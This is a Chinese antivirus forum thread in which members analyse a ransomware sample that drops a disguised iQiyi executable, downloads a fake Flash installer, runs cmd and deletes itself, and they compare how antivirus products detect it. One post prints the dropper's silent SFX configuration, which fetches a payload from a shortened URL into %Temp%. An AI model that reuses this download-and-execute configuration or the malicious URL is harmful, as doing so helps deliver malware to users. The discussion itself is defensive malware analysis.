楼主: TheYuCheng
收起左侧

[病毒样本] 新版勒索病毒-2018-7-25

  [复制链接]
B100D1E55
发表于 2018-7-25 11:36:42 | 显示全部楼层
www-tekeze 发表于 2018-7-25 11:34
B大,火绒报毒窗口里有:感染文件 install_flash_player.exe,那是不是这个安装包已被动了手脚,并不是个 ...

flash那个是恶意链接下载的,本体释放的安装包貌似是爱奇艺
www-tekeze
发表于 2018-7-25 11:44:59 | 显示全部楼层
B100D1E55 发表于 2018-7-25 11:36
flash那个是恶意链接下载的,本体释放的安装包貌似是爱奇艺

有联网请求,flash是下载的,但很快自删除,我快捷键截图都来不及,只留下了那个爱奇艺图标的,但对这个衍生的扫描,火绒和智量都不报,VT也没一家报,另外,这个爱奇艺的也是双击后瞬间自删除,不知道要搞哪样。。
www-tekeze
发表于 2018-7-25 12:24:09 | 显示全部楼层

你这个自制的会反沙盘?那反虚拟机么?      待会试试就知道了。。。
Picca
发表于 2018-7-25 13:15:43 | 显示全部楼层
禁止上报此病毒https://www.virustotal.com/#/file/b15e5b1730c3cf02bbef0dc930733fdf09d7a26bc57b3be2f6632899bfc2fc53/detection
已上传至VT
www-tekeze
发表于 2018-7-25 15:00:01 | 显示全部楼层
www-tekeze 发表于 2018-7-25 12:24
你这个自制的会反沙盘?那反虚拟机么?      待会试试就知道了。。。

虚拟机里放开跑了下,首先释放一个爱奇艺图标的exe,然后联网下载flash,而这个flash会调用cmd。。。
最终自删除,其它行为看不到,也许反虚拟机?


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
www-tekeze
发表于 2018-7-25 15:10:50 | 显示全部楼层
本帖最后由 www-tekeze 于 2018-7-25 15:38 编辑
www-tekeze 发表于 2018-7-25 15:00
虚拟机里放开跑了下,首先释放一个爱奇艺图标的exe,然后联网下载flash,而这个flash会调用cmd。。。
最 ...

实机影子模式里双击,情况相同,最终自删除,也许恶意下载源失效,over?
紧接着用火绒快速扫描也没发现问题,凭空消失了。。     附上云沙箱里的行为,进程crashed 。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
病毒探索者
发表于 2018-7-25 15:19:55 | 显示全部楼层
KIS 2019 miss,沙箱运行自动退出,全程卡巴无反应

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
病毒探索者
发表于 2018-7-25 15:23:57 | 显示全部楼层
病毒探索者 发表于 2018-7-25 15:19
KIS 2019 miss,沙箱运行自动退出,全程卡巴无反应

奇怪的是....

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
lixihong10
发表于 2018-7-25 15:45:07 | 显示全部楼层
Path=%Temp%
Setup=sfdownload314870.exe "http://dwz.cn/8QPpNa7c" "%Temp%\install_flash_player.exe" "" "" "" "" "" ""
Silent=1
Overwrite=2

http://dwz.cn/8QPpNa7c
还原后:
https://note.youdao.com/yws/api/ ... a5eb2635e8ee38085ee

白名单程序给黑名单URL执行,学习学习这个骚操作。

ESET 7月15号的病毒库 杀。白加黑在ESET这不管用了。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
b17273896
发表于 2018-7-25 15:51:38 | 显示全部楼层
FSP双击拦截

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-4-26 21:20 , Processed in 0.101276 second(s), 14 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表